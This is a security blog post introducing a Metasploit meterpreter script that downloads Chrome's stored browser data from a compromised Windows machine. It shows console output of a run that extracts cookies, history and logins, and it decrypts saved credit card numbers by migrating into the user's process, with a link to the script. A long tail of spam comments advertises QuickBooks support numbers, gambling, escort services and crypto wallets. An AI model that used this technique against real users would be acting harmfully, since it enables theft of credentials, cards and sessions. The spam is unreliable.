A few days later Google announced that Chrome 6 will support form autofill including credit card information.
I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.
The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse.
The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData:
"Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer."
To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension.
To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges.
To get the data of the currently logged on user, the script allows to automatically migrate into the exlorer.exe process and, after the decryption is done, back into the original process.
The following shows the console output of the script:
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run enum_chrome -m [*] current PID is 1100. migrating into explorer.exe, PID=2916... [*] done. [*] running as user 'VM-WINXP\test'... [*] extracting data for user 'test'... [*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'... [*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'... [*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'... [*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'... [*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'... [*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'... [*] creating file 'autofill.json'... [*] creating file 'autofill_profiles.json'... [*] creating file 'autofill_credit_cards.json'... [*] decrypting field 'card_number_encrypted'... [*] creating file 'cookies.json'... [*] creating file 'history.json'... [*] creating file 'logins.json'... [*] creating file 'bookmarks.json'... [*] creating file 'preferences.json'... [*] migrating back into PID=1100... [*] done. meterpreter >
The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script):
[
{
"label": "",
"verification_code_encrypted": "",
"unique_id": 1,
"expiration_year": 2010,
"card_number": "",
"shipping_address": "",
"type": "",
"card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
"billing_address": "",
"expiration_month": 12,
"verification_code": "",
"name_on_card": "Test Card",
"card_number_encrypted_decrypted": "0123456789012345"
}
]
You can download the script here: http://github.com/svent/misc/blob/master/metasploit/enum_chrome.rb
Posts
Hi,
ReplyDeleteMetasploit v3.4.2 not supported ? Running BackTrack 4. Can you update your script.
hi , I want to learn..
DeleteFind out more how to make them.
Download Song
i like it :)
ReplyDeleteI have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! Download UC browser mini
ReplyDeleteVery good points you wrote here..Great stuff...I think you've made some truly interesting points.Keep up the good work. Search Bar Firefox 57 Quantum addon
ReplyDeleteيتوافر لدي موقع مكتبتك الكثير من الخدمات التقنية العالية في الجودة والتميز منها الترجمة البحثية التي يلجئ اليها الكثير من الباحثين في جميع المراحل التي يمر بها البحث
ReplyDeleteيتواجد لدي موقع مكتبتك العديد من الانواع المختلفة للتقنيات العالية في الجودة منها المساعدة في اعداد الاطار النظري للبحث مع الحرص علي اظهار شخصية الباحث
ReplyDeleteيعتبر موقع مكتبتك من أهم المواقع التي تسهم في توفير ترجمة علمية وطبية في كافة المجالات لكي تفتح المجال أمام الباحث العلمي خلال اعداد الاطار النظري للحصول على الترجمة البحثية والعلمية المتخصصة من قبل مجموعة من المتخصصين
ReplyDeleteIf you found any login issues, installation issues, Printing, and PDF-related issues, you can download the Quickbooks tool hub to fix all the issues. This tool is the combination of all the Quickbooks tools in one application to save your time.
ReplyDeleteQuickbooks tool hub download
Nice & Informative Blog !
ReplyDeleteFor managing accounting tasks, you should use QuickBooks accounting software.In case you have faced any technical issues in QuickBooks, call us at QuickBooks Customer Service 1-(855)-729-7482.
common steps on how to How to fix Quickbooks error code 15270 are
ReplyDeleteUpdating your Quickbooks from main menu option
Download and install Quickbooks tool hub - it rectifies the update error 15270.
If it is difficult to cope with the task on your own or there is simply not enough time for it, then it is worth ordering a “Do My Essay For Me Uk” task from the best authors of the UK. Such work is more complicated than a simple article since it takes a lot of time and effort to study various materials.
ReplyDeleteI'm not quite good at coding, nevertheless, this source might be useful for a lot of people or those who start programming. One of my friends worked as a writer at a film review writing service https://mid-terms.com/write-my-movie-review-for-me/ he might be interested in this article as well.
ReplyDeleteThe Industrial Wastewater Treatment Market size is expected to grow from USD 11.3 billion in 2019 to USD 15.0 billion by 2024, at a CAGR of 5.8%. The requirement of a safe working environment in industrial facilities is also boosting the demand for industrial wastewater treatment. Power generation is the largest as well as the fastest-growing end-use industry of industrial wastewater treatment, where clean water is an essential component for electricity generation. The rapidly growing population and urbanization along with changing lifestyle have resulted in increasing per capita power consumption.
ReplyDeleteThis comment has been removed by the author.
ReplyDeletenice job guys i like it
ReplyDeleteسایت رز موزیک
آهنگ حسین توکلی دلمو بردی
آهنگ نوان فرشته
Online pdf editor
ReplyDeleteOnline gambling clubs, otherwise called virtual club or web gambling club are an internet based rendition of customary gambling clubs.영천출장샵추천
ReplyDelete상주출장샵추천
문경출장샵추천
경산출장샵추천
창원출장샵추천
진주출장샵추천
통영출장샵추천
사천출장샵추천
제주도출장샵
ReplyDelete출장샵예약금환불
아산출장샵
횟수 무제한 출장뜻
출장샵
진해출장샵
ReplyDeleteآهنگ شاد ایرانی جدید
Coinbase Wallet is a secure, user-friendly cryptocurrency wallet that allows users to store, send, and receive digital assets. It supports a wide range of cryptocurrencies, offering seamless integration with decentralized applications.
ReplyDeleteCoinbase Wallet ||
Coinbase.com ||
Coinbase Extension ||